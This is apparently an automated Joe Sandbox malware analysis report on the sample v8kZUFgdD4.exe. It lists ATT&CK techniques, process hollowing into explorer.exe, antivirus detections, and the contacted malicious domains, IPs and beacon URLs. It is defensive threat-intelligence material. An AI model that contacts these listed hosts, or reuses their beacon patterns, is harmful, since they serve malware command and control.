          Privilege Escalation: Process Injection 512; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Virtualization/Sandbox Evasion 2; Process Injection 512; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 3; Software Packing 11; Steganography
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Security Software Discovery 121; Virtualization/Sandbox Evasion 2; Process Discovery 2; Remote System Discovery 1; System Network Configuration Discovery 1; System Information Discovery 12
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 3; Non-Application Layer Protocol 3; Application Layer Protocol 13; Fallback Channels; Multiband Communication
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

          Behavior Graph

          Behavior Graph ID: 452667 | Sample: v8kZUFgdD4.exe | Start date: 22/07/2021 | Architecture: WINDOWS | Score: 100

          Legend of the original graph (reproduced as text): process; signature; created file; DNS/IP info; is dropped; is Windows process; number of created registry values; number of created files; language (Visual Basic, Delphi, Java, .Net C# or VB.NET, or C, C++ or other); is malicious; Internet. Numeric badges next to a process node are the created-files / registry-values counters from that legend.

          Sample-level DNS/IP info: www.wthcoffee.com; www.cwdelrio.com; wthcoffee.com
          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

          Process tree, with the signatures and DNS/IP info the graph attaches to each node:

          v8kZUFgdD4.exe (started)
              Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
              v8kZUFgdD4.exe (started, second instance)
                  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                  explorer.exe (injected)
                      DNS/IP info: jorgeporcayo.com 162.241.62.54, 49763, 80, UNIFIEDLAYER-AS-1US, United States; doityourselfism.com 169.62.77.158, 49752, 80, SOFTLAYERUS, United States; 14 other IPs or domains
                      Signatures: System process connects to network (likely due to code injection or exploit); Uses ipconfig to lookup or modify the Windows network settings
                      ipconfig.exe (started; badge 12)
                          DNS/IP info: www.aizaibali.com
                          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                          cmd.exe (started; badge 1)
                              conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          v8kZUFgdD4.exe | 38% | Virustotal | 

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.ipconfig.exe.3ac7960.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.v8kZUFgdD4.exe.2190000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
          7.2.ipconfig.exe.11406b0.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
          0.2.v8kZUFgdD4.exe.21d0000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.2.v8kZUFgdD4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.1.v8kZUFgdD4.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          extinctionbrews.com | 5% | Virustotal | 
          www.aizaibali.com | 0% | Virustotal | 

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | 100% | Avira URL Cloud | malware
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | 100% | Avira URL Cloud | malware
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          www.extinctionbrews.com/dy8g/ | 0% | Avira URL Cloud | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx | 0% | Avira URL Cloud | safe
          http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3 | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          extinctionbrews.com | 34.102.136.180 | true | false |  | unknown
          jorgeporcayo.com | 162.241.62.54 | true | true |  | unknown
          www.aizaibali.com | 154.88.31.204 | true | true |  | unknown
          invisiongc.net | 34.102.136.180 | true | false |  | unknown
          www.scuolatua.com | 62.149.128.40 | true | true |  | unknown
          www.findfoodshop.com | 119.59.120.26 | true | true |  | unknown
          doityourselfism.com | 169.62.77.158 | true | true |  | unknown
          okinawarongnho.com | 103.138.88.11 | true | true |  | unknown
          www.ecofingers.com | 52.58.78.16 | true | true |  | unknown
          wthcoffee.com | 184.168.131.241 | true | true |  | unknown
          www.wthcoffee.com | unknown | unknown | true |  | unknown
          www.oikoschain.com | unknown | unknown | true |  | unknown
          www.xn--vuq722jwngjre.com | unknown | unknown | true |  | unknown
          www.extinctionbrews.com | unknown | unknown | true |  | unknown
          www.doityourselfism.com | unknown | unknown | true |  | unknown
          www.cwdelrio.com | unknown | unknown | true |  | unknown
          www.invisiongc.net | unknown | unknown | true |  | unknown
          www.jorgeporcayo.com | unknown | unknown | true |  | unknown
          www.okinawarongnho.com | unknown | unknown | true |  | unknown

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.okinawarongnho.com/dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.doityourselfism.com/dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | true | Avira URL Cloud: malware | unknown
http://www.scuolatua.com/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.extinctionbrews.com/dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx | false | Avira URL Cloud: safe | unknown
http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | false | Avira URL Cloud: malware | unknown
www.extinctionbrews.com/dy8g/ | true | Avira URL Cloud: safe | low
http://www.ecofingers.com/dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown
http://www.jorgeporcayo.com/dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx | true | Avira URL Cloud: safe | unknown

                                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.343561590.000000000095C000.00000004.00000020.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.carterandcone.coml | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.typography.netD | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://fontfabrik.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.fonts.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | - | high
http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.sakkal.com | explorer.exe, 00000005.00000000.360323834.000000000B1A6000.00000002.00000001.sdmp | false | URL Reputation: safe (3x) | unknown
http://www.scuolatua.com:80/dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3 | ipconfig.exe, 00000007.00000002.601572909.0000000003C42000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                                                                  Contacted IPs

(World map of contacted IPs not reproduced; map legend: No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs)

                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.58.78.16 | www.ecofingers.com | United States | 16509 | AMAZON-02US | true
62.149.128.40 | www.scuolatua.com | Italy | 31034 | ARUBA-ASNIT | true
162.241.62.54 | jorgeporcayo.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
169.62.77.158 | doityourselfism.com | United States | 36351 | SOFTLAYERUS | true
34.102.136.180 | extinctionbrews.com | United States | 15169 | GOOGLEUS | false
103.138.88.11 | okinawarongnho.com | Viet Nam | 45538 | ODS-AS-VNOnlinedataservicesVN | true
154.88.31.204 | www.aizaibali.com | Seychelles | 40065 | CNSERVERSUS | true
119.59.120.26 | www.findfoodshop.com | Thailand | 56067 | METRABYTE-TH453LadplacoutJorakhaebuaTH | true

                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 452667
Start date: 22.07.2021
Start time: 17:41:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: v8kZUFgdD4.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/0@16/8
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.7% (good quality ratio 16.8%)
• Quality average: 71.2%
• Quality standard deviation: 34.6%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 104.43.193.48, 13.88.21.125, 92.122.145.220, 104.42.151.234, 52.147.198.201, 20.82.209.183, 173.222.108.226, 173.222.108.210, 51.103.5.186, 52.251.79.25, 40.112.88.60, 80.67.82.235, 80.67.82.211, 23.35.236.56, 20.82.210.154
• Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  No simulations

                                                                  Joe Sandbox View / Context

                                                                  IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
52.58.78.16 | mal.exe | Get hash | malicious | Browse | www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk
52.58.78.16 | PO_2005042020.exe | Get hash | malicious | Browse | www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ
52.58.78.16 | Invoice-Scancopy.docx | Get hash | malicious | Browse | www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==
52.58.78.16 | ORDER 200VPS.xlsx | Get hash | malicious | Browse | www.aideliveryrobot.com/p2io/?bH=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&XV88=urL00v88onXp_
52.58.78.16 | LAGIk5ic3R.exe | Get hash | malicious | Browse | www.quickinterchangeableguitars.com/0mq2/?fDHX8=WleDGb2XfF7tUd0&o6ATq=PrDeBWOvFm4C1uiT5+TkruHjtP7PYgIXMNukuC19GOh7I/zDw4hvhKpfG3R3/sFyDX1r
52.58.78.16 | 3456_RFQ998778.xlsx | Get hash | malicious | Browse | www.jmbossvodka.com/gno4/?-ZS=YdtY2bnE57KZ5WgSsIzeA3q4iz7LDafvQmGQHnumUAAK16ZgD7FJS8vZbyZDCBBis2h0IQ==&e4=8pNH
52.58.78.16 | Payment_Breakdown_pdf.exe | Get hash | malicious | Browse | www.onlineappointmentsystem.com/ons5/?3f-=nVZuwkx8QtdDg8xrBBXA1XtU0x+dB6tS53/N0IsFnt8ggCwz+Hq54W4pscUCIRDkRkLu&YR-0=y48tk6C
52.58.78.16 | owen.exe | Get hash | malicious | Browse | www.syeioraom.com/a8si/?g2J4yx=-Zg4GfE&S4=2gqxBbxdCHAGZiW08HusmFGOvmsXdbr8Hht+pti8HbRhpYj5OmStbJLwswr0+a+SFvsW
52.58.78.16 | FASMW.EXE | Get hash | malicious | Browse | www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50
52.58.78.16 | po_order_item_29062021.exe | Get hash | malicious | Browse | www.monkeyhunter.com/rht3/?y0=Btx4&RV_l=AlhR87CcH+GN+pIusHgdFqhLxnRwmvwNBNp0g7IcE6I1zhj/b7sMRAUJpklc7EpOOxOv
52.58.78.16 | Minutes of Meeting 22062021.exe | Get hash | malicious | Browse | www.eclorui.com/u9pi/?uXR=Z6AdLL&QDHdAp=SWx04GMips4+qG0r1MuFGGrLJlmHj2ZkiaS2KvW5DkDO80Zko+5IrbiudSoPPaV6iNFo
52.58.78.16 | PO NEW ORDER 002001123.exe | Get hash | malicious | Browse | www.sparktattoo.com/0mq2/?c4=IDKtp8tH&4h_hvt=idlga/P0FfYCKTBivrcOkdytvtILpJxZJlPumr4sHFEsS0Scr/u/HZg+xbKITV9CPDtJ
52.58.78.16 | Swift advice Receipt.exe | Get hash | malicious | Browse | www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23
52.58.78.16 | eHTLcWfhgv.exe | Get hash | malicious | Browse | www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT
52.58.78.16 | Import Custom Duty invoice & its clearance documents.exe | Get hash | malicious | Browse | www.cool-sil.com/iic6/?r4pT=y/kfwyw/RZwsvgZE5IY9NPvw7FTiW/OGKxX5BqNDRQj08yuVS/JTuewaC78miPUy3gtG&lR-x=DPUt3nr8mrdpDjG
52.58.78.16 | TT-Bank-Slip.exe | Get hash | malicious | Browse | www.vaginalmedicine.com/m3rc/?p2=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&6lM=SJEx9rv
52.58.78.16 | Enquiry_014821-23.exe | Get hash | malicious | Browse | www.johnmabry.com/n86i/?zBtlQRl=Y8G/RqOPd6iMXSNDp68Mpx61scf3/6KZP+emN2XlS3BALTl1RcjIqekJnqea+Qg2WqdJDqumrQ==&-ZW=NBsHKPh0D0YP7FE
52.58.78.16 | SKM_4050210326102400 jpg.exe | Get hash | malicious | Browse | www.justswap.exchange/nvj9/?4h=Cjox&2d=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN6sncqWGGRf/
52.58.78.16 | kkaH2ZEdQ1.exe | Get hash | malicious | Browse | www.cacacece.com/ybn/?oRm8=s8YlDbK80xIp&-ZdTr=nRee68VRz3NrMycEhRd2xL3VYKU8ZPsfy7+/YZQiZ17kpYPgKQlxEGBpOHvvMJMEZLP0
52.58.78.16 | RE Purchase Order.exe | Get hash | malicious | Browse | www.dahumblehustla.com/u6e4/?WBZD=FcjbzBS6ioR5wNj31i3bICntrHdtVtLDdz4suCSLzvDCKJtKmLQo4u4Bo+cvT6cF9+Bm&TR-=0b08lfbHdjGhtdZp

                                                                  Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
www.scuolatua.com | Swift-Payment_Details.xlsx | Get hash | malicious | Browse | 62.149.128.40
www.scuolatua.com | Rq0Y7HegCd.exe | Get hash | malicious | Browse | 62.149.128.40
www.scuolatua.com | 0FKzNO1g3P.exe | Get hash | malicious | Browse | 62.149.128.40
www.aizaibali.com | QxnlprRUTx.exe | Get hash | malicious | Browse | 154.88.31.204
www.aizaibali.com | w3Qf2wBNX7.exe | Get hash | malicious | Browse | 154.88.31.204
www.ecofingers.com | d6qU4nYIEp.exe | Get hash | malicious | Browse | 52.58.78.16
www.ecofingers.com | seBe6bgLTw.exe | Get hash | malicious | Browse | 13.248.216.40
www.ecofingers.com | 7VGeqwDKdb.exe | Get hash | malicious | Browse | 13.248.216.40

                                                                  ASN

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
AMAZON-02US | S0qI7cmeOW | Get hash | malicious | Browse | 35.75.55.55
AMAZON-02US | Form BA.xlsx | Get hash | malicious | Browse | 3.121.113.175
AMAZON-02US | #6495PI-29458-2020.exe | Get hash | malicious | Browse | 54.169.219.94
AMAZON-02US | Statement SKBMT 09818.jar | Get hash | malicious | Browse | 75.2.26.18
AMAZON-02US | DCBR.msi | Get hash | malicious | Browse | 18.228.5.161
AMAZON-02US | NQBNpLezqZKv1P4.exe | Get hash | malicious | Browse | 46.137.146.55
AMAZON-02US | kkXJRT8vEl.exe | Get hash | malicious | Browse | 52.217.42.228
AMAZON-02US | kS2dqbsDwD.exe | Get hash | malicious | Browse | 52.217.201.169
AMAZON-02US | Nb2HQZZDIf.exe | Get hash | malicious | Browse | 52.216.94.27
AMAZON-02US | ovLjmo5UoE | Get hash | malicious | Browse | 63.34.62.30
AMAZON-02US | o3ZUDIEL1v | Get hash | malicious | Browse | 18.151.13.78
AMAZON-02US | D1dU3jQ1II | Get hash | malicious | Browse | 
                                                                  • 34.208.242.240
                                                                  mal.exeGet hashmaliciousBrowse
                                                                  • 52.58.78.16
                                                                  vjsBNwolo9.jsGet hashmaliciousBrowse
                                                                  • 76.223.26.96
                                                                  r3xwkKS58W.exeGet hashmaliciousBrowse
                                                                  • 52.217.135.113
                                                                  A7X93JRxhpGet hashmaliciousBrowse
                                                                  • 54.151.74.14
                                                                  1Ds9g7CEspGet hashmaliciousBrowse
                                                                  • 13.208.189.104
                                                                  XuQRPW44hiGet hashmaliciousBrowse
                                                                  • 54.228.23.118
                                                                  Taf5zLti30Get hashmaliciousBrowse
                                                                  • 44.231.84.110
                                                                  5qpsqg7U0GGet hashmaliciousBrowse
                                                                  • 34.219.219.82
                                                                  ARUBA-ASNITSwift-Payment_Details.xlsxGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  Xlojlgo2gbGet hashmaliciousBrowse
                                                                  • 134.255.177.23
                                                                  XfKsLIPLUuGet hashmaliciousBrowse
                                                                  • 217.73.230.179
                                                                  o0z4JJpYNfGet hashmaliciousBrowse
                                                                  • 212.237.36.89
                                                                  soa-032119.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  d6qU4nYIEp.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  1Ptfo0FZUMT7hlK.exeGet hashmaliciousBrowse
                                                                  • 89.46.110.19
                                                                  0VjjGsIIBB.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  WPxoHlbMVs.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  hiisl0XvrE.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  cCEP3pyVp8.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  pCCZmmulmJ.exeGet hashmaliciousBrowse
                                                                  • 217.61.51.61
                                                                  Rq0Y7HegCd.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  242jQP4mQP.exeGet hashmaliciousBrowse
                                                                  • 89.46.109.25
                                                                  RblUKpEC0p.exeGet hashmaliciousBrowse
                                                                  • 89.46.107.249
                                                                  N0vpYgIYpv.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.60
                                                                  droxoUY6SU.exeGet hashmaliciousBrowse
                                                                  • 62.149.144.56
                                                                  0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                  • 62.149.128.40
                                                                  28Y753mbw5.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243
                                                                  7ujc2szSQX.exeGet hashmaliciousBrowse
                                                                  • 80.88.87.243

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.939883976403979
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
